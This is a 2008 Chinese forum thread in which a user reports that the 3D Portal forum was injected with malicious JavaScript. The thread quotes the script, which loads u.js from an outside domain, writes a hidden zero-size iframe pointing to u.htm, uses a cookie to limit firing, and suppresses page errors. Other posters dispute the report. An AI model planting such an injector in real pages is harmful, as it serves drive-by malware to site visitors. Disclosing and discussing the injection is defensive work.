此网被挂马

czy12

马:Hack.Exploit.Script.JS.Mixed.c

1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script>
   
2. 
   % x+ {6 f- A+ x: T
3. document.writeln("<script>";
   ! F3 M4 z, m! S8 n; Z$ v
4. document.writeln("function oK_Begin(){";
   % m  s: i8 q7 M8 o6 C
5. document.writeln("var Then = new Date() ";
   
6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";
   4 w9 M  z3 C2 Q' F: F
7. document.writeln("var cookieString = new String(document.cookie)";
   
8. document.writeln("var cookieHeader = "Cookie1=" ";
   
9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";
   
10. document.writeln("if (beginPosition != -1){ ";
    6 K* B' W" H5 o0 B4 v8 G% ]7 }0 m
11. document.writeln("} else ";
    # H6 {3 w7 v) O9 c. C
12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";
    
13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";
    
14. document.writeln("}";
    
15. document.writeln("}";
    ) ^! `8 a: ~8 }1 B) I
16. document.writeln("oK_Begin();";
    
17. document.writeln("<\/script>";
    8 Z( `  f2 h- |- G9 {
18. document.writeln("<script>window.onerror=function(){return true;}<\/script>"
    * m; X5 |7 l2 ^" S) H6 ?$ _5 T
19. 
    2 W. j% c' \( p, K" P& c
20. 
    
21. 
      J3 i( j9 Z0 s' q: s
22. 
    5 e! C: x0 g  @( b7 g
23. 
    7 g. c1 d$ C9 [4 O6 \: G/ @. _1 e

复制代码

虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马

19720205

请管理员确认是否网页挂马?

cayuer

我的麦咖啡都没检测出来 你什么杀毒软件？

czy12

不是杀软件查的.
# H# a1 Y4 w5 ]7 Z只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.
不过,已经被清理了.
' R+ b9 @' K% _& j
) s% h/ t, ?7 A; v1 Q  W* V: y/ YHEHE只是没有礼貌

. U6 ~6 Q0 M6 Q5 P( B[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]

江南有雪

你这个什么网站，哪里出来的？
" B  y, y1 v1 P
) L5 F& g. P. |7 w% Kht tp://u.cruze3.cn/u.js

czy12

http://u.cruze3.cn/u.js
+ v2 n  }% a/ g* l% A" n此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.
这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.
HEHE

wwqq

这跟三维有什么关系？

czy12

这是挂在三维网论坛里的.
红线所指

huang_baker

奇怪，为什么我的里面没有？是不是楼主的机器自己带病毒了？

小雪

自己的机子中毒了，就不要满天喊叫了，没人会认为你是一个杀毒的行家

czy12

不学无术.
HEHE

yyywwwhk

但在:
! z7 e6 F- b; Y5 _# qhttp://www.3dportal.cn/discuz/ 之原始檔
似乎看不见楼主所说的 http://u.cruze3.cn/u.js

" Z; [3 u* B! g$ `8 L# o; J7 r[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]

新洁电子

经过自编扫描代码处理结果，未发现楼主说的挂马代码！
* e% c, H1 R" o" E0 W
% e0 l' K- v; V% S& p- e1 a2 @9 r请清理自己计算机的缓冲区！

college

看您的尾符/script，很像是U盘病毒。

czy12

DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。
我也说了：已修复。

# i  r# S) e  e/ Wps:这与缓存毫无关系。虽然缓存中有U.JS.
但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?

2 C# f( D$ ^2 s8 u* ]) N2 g: fscript是个JAVA代码,与U盘何关?

HEHE

[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]

新洁电子

非也，代码是程序直接采样的当时的网页代码，是自编的，算不上权威，但是可以直接进入部分加密网站！

如果却如你说的修改了，我想，这只有论坛管理员有这个权限，即便是后台也是有记录的。假如确实是论坛后台修改了，一定会给大伙一个说法的。

$ d# W/ F) M7 t# ]! i* W8 o& g相反，目前从各方面提供的代码显示，确实“此时此刻”是正常的！至于继续讨论已经无大的价值！